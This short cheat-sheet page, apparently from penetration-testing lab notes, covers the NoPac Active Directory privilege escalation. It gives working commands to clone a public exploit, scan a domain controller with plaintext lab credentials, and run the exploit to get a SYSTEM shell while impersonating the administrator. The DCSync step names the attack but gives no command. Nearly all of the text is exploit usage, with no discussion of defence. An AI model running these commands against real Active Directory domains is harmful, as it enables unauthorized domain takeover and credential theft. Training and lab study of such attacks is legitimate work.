NoPac
NoPac is a privilege escalation vulnerability affecting Active Directory environments, allowing attackers to impersonate privileged accounts and execute malicious actions.
1. Clone NoPac Exploit Repository
Command:
sudo git clone https://github.com/Ridter/noPac.git2. Scan for NoPac Vulnerability
Command:
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap3. Exploit NoPac to Gain SYSTEM Shell
Command:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --shell --impersonate administrator -use-ldap4. Exploit NoPac for DCSync Attack
Command:
Last updated